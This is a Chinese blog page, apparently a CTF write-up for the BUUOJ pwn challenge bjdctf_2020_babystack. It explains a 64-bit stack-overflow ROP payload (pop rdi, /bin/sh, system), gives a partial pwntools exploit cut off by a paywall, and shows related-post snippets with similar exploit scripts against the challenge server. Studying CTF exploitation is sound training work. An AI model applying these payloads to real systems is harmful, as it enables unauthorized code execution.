CTF buuoj pwn-----第10题: bjdctf_2020_babystack

最新推荐文章于 2025-02-18 22:56:03 发布
原创 最新推荐文章于 2025-02-18 22:56:03 发布 · 2.2w 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #linux #安全 #pwn

本文档详细记录了通过利用程序中的后门函数,结合64位系统调用约定,构造payload并使用Python编写exploit来执行系统命令获取BJDCTF挑战的flag的过程。

CTF buuoj pwn-----第10题: bjdctf_2020_babystack

1 思路

  • 本题有后门函数, 最简单的是直接调用, 又快又好.
  • 这里想用一下system函数,一开始忘了本题是64位的,调用约定不同, 写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功
  • 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag

2 编写exp

from pwn import *  

context.log_level='debug'

sh = remote('node4.buuoj.cn', 26883)
elf = ELF('./bjdctf_2020_babystack')  


pop_rdi_addr = 0x400833
system_addr = elf.sym['system']
binsh_addr = 0x400858
main_addr = elf.sym['main']


sh.recvuntil
最低0.47元/天 解锁文章
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 1155
[buuctf]bjdctf_2020_babystack
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 437
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 452
[BUUCTF-pwn]——bjdctf_2020_babystack 目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
[BUUCTF]PWN18——bjdctf_2020_babystack
mcmuyanga的博客
09-02 4452
[BUUCTF]PWN18——bjdctf_2020_babystack 附件 步骤: 例行检查,64位,开启了nx保护 试运行一下程序 大概了解程序的执行过程后用64位ida打开,shift+f12先查看一下程序里的字符串 看到/bin/sh双击跟进,ctrl+x找到了后门函数,shell_addr=0x4006e6 根据试运行的回显,找到了输入点 一个简单的小程序,buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出 EXP from pwn import* r=re
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 395
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
buuctf-bjdctf_2020_babystackpwn
最新发布
2301_81574836的博客
02-18 1026
buuctf-bjdctf_2020_babystackpwn
CTF】BUUCTF-bjdctf_2020_babystack1
weixin_53394081的博客
03-06 685
PWN
BUUOJ PWN 61-80
2h4ox1n9
12-17 383
61\
CTF解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1729
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
BUUCTF bjdctf_2020_babystack
小白垃圾笔记2
04-30 518
有的,所以我们的利用思路就是将返回地址先覆盖为pop rdi;ret 的地址,将参数(/bin/sh)传入rdi。然后再将system的地址填充进去,这样pop rdi;执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用,并且存在/bin/sh。去找有没有pop rdi ret。小白做笔记而已,不建议阅读。64为程序用rdi传参。read函数存在栈溢出。
bjdctf_2020_babystack
、moddemod
06-13 966
exp from pwn import * context(log_level = 'debug') proc_name = './bjdctf_2020_babystack' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 29943) pop_ret = 0x400833 system_addr = elf.sym['system'] bin_sh_str = 0x400858 payload =..
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 449
BUUCTF练习
BUUCTF(pwn)bjdctf_2020_babystack
半岛铁盒的博客
03-29 513
from pwn import * p = remote("node3.buuoj.cn",27955) sys = 0x04006E6 p.sendlineafter("[+]Please input the length of your name:\n",'200') payload = 'a' * (0x10 + 0x8) + p64(sys) p.sendlineafter("[+]What's u name?\n",payload) p.interactive() 有疑问的欢迎留言∑ ...
bjdctf_2020_babystack【BUUCTF
qq_41696518的博客
08-26 1141
bjdctf_2020_babystack
CTFbjdctf_2020_babystack 1
凉水的博客
01-21 1646
思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
BUUCTF|PWN-bjdctf_2020_babystack2-WP
l2645470582_的博客
11-09 538
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,我们看到关键字符串"/bin/sh" 然后我们找到后门函数的地址:backdoor_addr = 0x0400726 3.我们看看main函数里面的内容 我们看到第一个nbytes是有符号数,第二个nbytes就变成了无符号数 我们判断这是一个整数溢出 所以 -1 = 4294967295 4.EXP #encoding = utf-8 fr...
ctf杂项:easy-nbt
资源摘要信息:"CTF杂项:easy-nbt" 知识点: 1. CTF(Capture The Flag)介绍 CTF是一种信息安全竞赛,通常包括多种类型的问和挑战,目的是考验参赛者的各种技能,如逆向工程、密码学、二进制分析、Web安全、...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值